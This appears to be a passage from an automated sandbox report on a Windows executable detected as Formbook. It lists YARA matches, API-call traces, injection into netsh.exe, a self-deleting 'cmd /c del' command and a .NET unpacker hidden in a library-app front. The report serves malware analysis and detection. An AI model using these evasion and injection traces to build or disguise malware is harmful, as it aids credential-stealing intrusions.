          Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 0_2_008E5C24
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 0_2_02B98250
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 0_2_02B9D2F8
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 1_2_002F5C24
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00401030
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0041BC78
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00408C7B
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00408C80
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0041BD01
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00402D90
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0041BEE0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0041CFB6
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00565C24
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01004120
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FFB090
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A1002
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010120A0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B20A8
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B28EC
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEF900
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B2B28
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101EBB0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010ADBD2
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B22AE
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B2D07
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B1D55
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01012581
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B25DD
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF841F
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FFD5E0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010AD466
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE0D20
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B1FF1
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010AD616
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01006E30
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B2EF7
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0388DBD2
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03892B28
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037FEBB0
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038922AE
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037E4120
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037CF900
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038920A8
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038928EC
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03881002
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0389E824
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F20A0
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037DB090
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03891FF1
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037E6E30
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03892EF7
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0388D616
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038925DD
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037C0D20
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03892D07
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037DD5E0
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03891D55
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F2581
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037D841F
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0388D466
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DDBEE0
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DDCFB6
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DC2FB0
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DC8C80
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DDBC78
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DC8C7B
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DC2D90
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DDBD01
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: String function: 00FEB150 appears 35 times
          Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 037CB150 appears 35 times
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_004185E0 NtCreateFile
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00418690 NtReadFile
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00418710 NtClose
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_004187C0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_004185DA NtCreateFile
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0041870C NtReadFile, NtClose
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_004187BA NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010299A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010298F0 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029A00 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029A20 NtResumeThread, LdrInitializeThunk
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029540 NtReadFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010295D0 NtClose, LdrInitializeThunk
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010297A0 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010296E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029950 NtQueueApcThread
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010299D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029820 NtEnumerateKey
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0102B040 NtSuspendThread
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010298A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029B00 NtSetValueKey
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0102A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029A10 NtQuerySection
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0102AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029560 NtWriteFile
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010295F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0102A710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029760 NtOpenProcess
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0102A770 NtOpenThread
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029770 NtSetInformationFile
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029650 NtQueryValueKey
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010296D0 NtCreateKey
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038099A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038096D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038096E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038095D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0380A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809A10 NtQuerySection
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809A20 NtResumeThread
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038099D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038098A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038098F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0380B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038097A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0380A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809760 NtOpenProcess
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0380A770 NtOpenThread
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809650 NtQueryValueKey
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809660 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038095F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0380AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809560 NtWriteFile
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DD8690 NtReadFile
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DD8710 NtClose
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DD85E0 NtCreateFile
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DD870C NtReadFile, NtClose
          Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DD85DA NtCreateFile
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.358021001.0000000003BDD000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000000.342497076.0000000000950000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.359712250.0000000005B10000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.360053021.00000000060A0000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000001.00000000.351201212.0000000000360000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000002.00000000.354123685.00000000005D0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434893300.0000000002FCC000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamenetsh.exej% vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434541337.000000000126F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe Binary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | File read: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe:Zone.Identifier
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Process created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Process created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\cK1g5gckZR9VHjj.exe.log
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@9/1@7/4
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: cK1g5gckZR9VHjj.exe | String found in binary or memory: /IVectorVi;component/views/addbook.xaml
          Source: cK1g5gckZR9VHjj.exe | String found in binary or memory: views/addbook.baml
          Source: cK1g5gckZR9VHjj.exe | String found in binary or memory: views/addcustomer.baml
          Source: cK1g5gckZR9VHjj.exe | String found in binary or memory: /IVectorVi;component/views/addcustomer.xaml
          Source: cK1g5gckZR9VHjj.exe | String found in binary or memory: O/IVectorVi;component/views/addbook.xamle/IVectorVi;component/views/borrowfrombookview.xaml[/IVectorVi;component/views/borrowingview.xamlU/IVectorVi;component/views/changebook.xaml]/IVectorVi;component/views/changecustomer.xamlY/IVectorVi;component/views/customerview.xaml]/IVectorVi;component/views/deletecustomer.xamlS/IVectorVi;component/views/errorview.xamlW/IVectorVi;component/views/smallextras.xamlW/IVectorVi;component/views/addcustomer.xaml
          Source: cK1g5gckZR9VHjj.exe | String found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: cK1g5gckZR9VHjj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: cK1g5gckZR9VHjj.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netsh.pdb source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
          Source: Binary string: netsh.pdbGCTL source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: cK1g5gckZR9VHjj.exe, cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: cK1g5gckZR9VHjj.exe, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.cK1g5gckZR9VHjj.exe.8e0000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.cK1g5gckZR9VHjj.exe.8e0000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.2.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.3.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.1.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.cK1g5gckZR9VHjj.exe.2f0000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
